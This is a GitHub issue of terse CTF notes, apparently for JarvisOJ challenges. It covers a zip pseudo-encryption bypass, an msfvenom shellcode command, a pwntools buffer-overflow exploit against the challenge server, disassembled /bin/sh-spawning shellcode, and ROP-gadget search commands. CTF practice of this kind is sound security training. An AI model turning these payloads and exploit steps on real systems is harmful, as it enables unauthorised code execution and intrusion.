zhouat / ctf

0 stars 0 forks source link

wp for https://www.jarvisoj.com/challenges #3

Open zhouat opened 7 years ago

zhouat commented 7 years ago
  1. apk 伪加密 https://github.com/zhouat/DalvikBytecodeTampering/blob/master/unpack.py
    zip_file="word.zip"
    zip_entry="word.docx"
    from zipfile import ZipFile, ZipInfo
    zip_instance = ZipFile(zip_file)
    zip_info = zip_instance.getinfo(zip_entry)
    zip_info.flag_bits ^= zip_info.flag_bits % 2
    ZipFile.extract(zip_instance,zip_info
  2. shellcode https://www.offensive-security.com/metasploit-unleashed/msfvenom/ https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/ shellcodeexec
    msfvenom -a x86 --platform windows -p windows/messagebox TEXT="F**K U" -e x86/alpha_mixed -t raw BufferRegister=EAX

pwntool socket

from pwn import *
context.log_level='debug'
conn = remote('pwn.jarvisoj.com',9876)
print conn.readline()
conn.send('a'*0x88+'\x20\x06\x40\x00\x00\x00\x00\x00')
print conn.recvrepeat()

pop shell

In [23]: print disasm('\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80')
   0:   31 c0                   xor    eax,eax
   2:   50                      push   eax
   3:   68 2f 2f 73 68          push   0x68732f2f
   8:   68 2f 62 69 6e          push   0x6e69622f
   d:   89 e3                   mov    ebx,esp
   f:   50                      push   eax
  10:   53                      push   ebx
  11:   89 e1                   mov    ecx,esp
  13:   31 d2                   xor    edx,edx
  15:   b0 0b                   mov    al,0xb
  17:   cd 80                   int    0x80

Tools: JPK(JPocketKnife) Stegsolve asm(arch='arm') sudo apt-get install gcc-arm-linux-gnueabihf

zhouat commented 7 years ago

ropper -f level2_x64 --search "pop|edi|ret"

L2R [1] edi [2] esi [3] rdx [4] rcx [5] r8 [6] r9

R2L [7]...

zhouat commented 7 years ago

ROPgadget --binary pwn2 --ropchain

p32(0x080483e4).encode('hex').decode('hex')

ref: https://github.com/CTF-Thanos/ctf-writeups/tree/master/2016/429ctf/pwn/pwn2